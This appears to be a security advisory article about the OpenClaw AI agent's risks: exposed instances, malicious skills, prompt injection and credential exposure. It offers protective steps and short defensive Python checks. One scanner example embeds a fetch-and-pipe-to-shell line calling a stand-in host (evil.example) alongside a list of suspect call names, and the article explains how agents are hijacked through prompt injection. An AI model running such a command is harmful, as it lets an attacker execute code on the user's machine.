AI agents—software that can take actions on your behalf using artificial intelligence—are having a moment. The appeal is obvious: imagine a robot butler that triages your inbox, manages your calendar, and handles tedious tasks while you focus on more important work.

That’s the promise driving the surge in popularity of OpenClaw (formerly known as Clawdbot and Moltbot), now all the rage in tech circles. Token Security reports that at nearly a quarter of its enterprise customers, at least one person is running OpenClaw, mostly from personal accounts. That’s a shadow IT nightmare: employees connecting work email and Slack to an unsanctioned tool that IT doesn’t know about and can’t monitor. Whether you’re an individual tempted by OpenClaw’s promise or a manager wondering what your users are up to, you need to understand the risks these AI agents pose.

OpenClaw is an AI agent built around “skills”—installable plugins that let it integrate with your messaging apps, email, calendar, and more. You communicate with OpenClaw via Messages, Slack, WhatsApp, and similar apps. Because it’s open source, you’ll need to provide your own API keys for AI services like OpenAI or Anthropic, which means ongoing costs that can add up quickly—people have reported spending $10–$25 per day.
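Those metered API costs compound faster than most people expect. A back-of-the-envelope estimate, using the $10–$25 daily range people have reported:

```python
# Rough monthly cost from the reported $10-$25/day API spend.
daily_low, daily_high = 10, 25   # reported per-day spend in USD
days = 30                        # one month of continuous use

monthly_low = daily_low * days
monthly_high = daily_high * days
print(f"${monthly_low}-${monthly_high} per month")  # $300-$750 per month
```

That’s several times the cost of a flat-rate chatbot subscription, before counting any security fallout.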

The more serious problem? Security researchers have found real vulnerabilities: misconfigured instances exposed to the internet that leak credentials, API keys, and private messages, and a supply chain attack path in which malicious skills uploaded to the ClawdHub library can execute arbitrary commands on users’ systems. Even beyond specific bugs, OpenClaw’s fundamental design encourages users to grant broad access to sensitive accounts.
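The “exposed to the internet” failure mode usually comes down to a bind-address misconfiguration: a web interface listening on every network interface instead of only loopback. A minimal sketch of the check (the idea of a single configurable bind host is an assumption for illustration, not OpenClaw’s actual setting):

```python
def is_exposed(bind_host: str) -> bool:
    """Flag bind addresses reachable from other machines.

    0.0.0.0 and :: listen on every network interface; only
    loopback addresses keep the service local to this machine.
    """
    return bind_host.strip().lower() not in ("127.0.0.1", "localhost", "::1")

# Hypothetical examples of a configured bind address:
print(is_exposed("0.0.0.0"))    # True: all interfaces, reachable externally
print(is_exposed("127.0.0.1"))  # False: loopback only, local to this Mac
```

If a tool you install defaults to listening on all interfaces, every credential it holds is one port scan away from an attacker.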

Why AI Agents Are Risky

Security concerns aren’t unique to OpenClaw—they apply to any AI agent that acts on a user’s behalf. Here’s what’s at stake:

- Prompt injection: Any AI system that processes untrusted content (an incoming email, a shared document, a chat message) can be manipulated into taking actions its owner never intended.
- Credential exposure: Agents hold authentication tokens and API keys for every service they connect to, so a single compromise can spill all of them at once.
- Broad standing access: By design, agents like OpenClaw need ongoing access to your most sensitive accounts, which makes the blast radius of any breach far larger than that of a single compromised app.

How to Reduce Your Risk

We’ll come right out and say it: we strongly recommend against installing OpenClaw or other AI agents on your Mac. In a year or so, Apple may have updated Siri to provide many of these capabilities with significantly stronger privacy and security. But for now, just say no.

If you decide to use AI agents despite these risks, here are practical steps to protect yourself:

- Run the agent on a dedicated machine or user account, isolated from your everyday data.
- Connect accounts with the narrowest scopes available, using app-specific passwords or tokens you can revoke instantly.
- Never connect financial accounts or anything that can authorize payments.
- Keep the agent off the open internet; make sure its interface listens only on the local machine.
- Install skills only from sources you trust, and review what each one does before enabling it.
- Monitor your API spending so a runaway or hijacked agent can’t quietly rack up charges.

If you run a business, you should assume that some employees have already installed OpenClaw or will soon, and may have connected their work email and Slack accounts without realizing the associated risks. Here’s what you can do:

- Publish a clear, specific policy on AI agents so employees know what’s sanctioned and what isn’t.
- Audit the OAuth grants and connected apps on your corporate email and Slack workspaces, and revoke anything you don’t recognize.
- Watch network and endpoint telemetry for unsanctioned tools, just as you would for any other shadow IT.
- Offer a sanctioned alternative—employees adopt these tools because they solve real problems.
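On managed Macs, one concrete starting point is a simple inventory check for the agent’s process. A sketch using the portable `ps -eo comm` listing (the “openclaw” process name is an assumption; match it to whatever binary name the tool actually uses):

```python
import subprocess

def matching_processes(keyword: str) -> list[str]:
    """Return running process command names containing keyword (case-insensitive)."""
    out = subprocess.run(["ps", "-eo", "comm"], capture_output=True, text=True)
    lines = out.stdout.splitlines()[1:]  # skip the COMM header row
    return [line.strip() for line in lines if keyword.lower() in line.lower()]

# Flag this machine for follow-up if anything matches:
if matching_processes("openclaw"):
    print("unsanctioned agent found")
```

This catches only the obvious case; pairing it with network telemetry closes the gap for renamed or containerized installs.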

What About Claude Cowork and OpenAI Codex?

Not all AI agent platforms carry the same level of risk. Anthropic’s Claude Cowork and OpenAI’s Codex take a different architectural approach from OpenClaw. Rather than requesting authentication tokens for your email, messaging, and other personal services, they operate within their own controlled, sandboxed environments. These systems work primarily with files, code, and data you explicitly place into their workspace, which substantially limits the fallout from an attacker gaining some level of control.

This containment approach reduces risk, but does not eliminate it. Prompt injection remains a concern whenever an AI system processes untrusted content, even inside a sandbox. An AI agent analyzing a malicious document could still be manipulated into taking unintended actions within its allowed environment. Similarly, any code generated by these systems—particularly code that touches the network or executes system commands—should be reviewed carefully to make sure it hasn’t been compromised by prompt injection.
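That “review generated code carefully” step can be partially automated. A first-pass filter might parse the generated code and flag calls that touch the network or execute commands for human review; a minimal sketch using Python’s `ast` module (the list of call names is illustrative, not exhaustive):

```python
import ast

# Call names that execute commands or touch the network -- a
# starting list for triage, not a complete taxonomy of risk.
SUSPECT_CALLS = {"exec", "eval", "system", "popen", "urlopen", "connect"}

def flag_suspect_calls(source: str) -> list[str]:
    """Return suspect call names found in a piece of generated code."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
            if name in SUSPECT_CALLS:
                hits.append(name)
    return hits

generated = "import os\nos.system('curl http://evil.example | sh')"
print(flag_suspect_calls(generated))  # flags the shell execution
```

A static filter like this only narrows the review; it can’t replace reading the code, since prompt-injected logic can hide behind innocuous-looking calls.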

The key distinction is scope. Claude Cowork and Codex are designed to operate within a defined workspace, whereas tools like OpenClaw require standing access to your most sensitive accounts. From a security perspective, a compromised sandbox is a recoverable incident; a compromised email or messaging account may not be.

The Bottom Line

AI agents promise a lot and may provide genuine convenience, but at a cost beyond just paying for API tokens. Before you or anyone in your organization connects an AI agent to sensitive accounts, consider: What’s the worst that could happen if this system were compromised by an attacker? If the answer involves passwords being stolen, private email being exposed, or photos being posted to social media without your knowledge, proceed with extreme caution. If you can imagine a way financial accounts could be accessed or business data stolen, don’t proceed at all.

(Featured image by iStock.com/Thinkhubstudio)


Social Media: AI agents like OpenClaw promise to automate tedious tasks, but recent security vulnerabilities highlight the dangers of using them. Learn the risks and how to protect yourself—and your organization—if you choose to use an agent.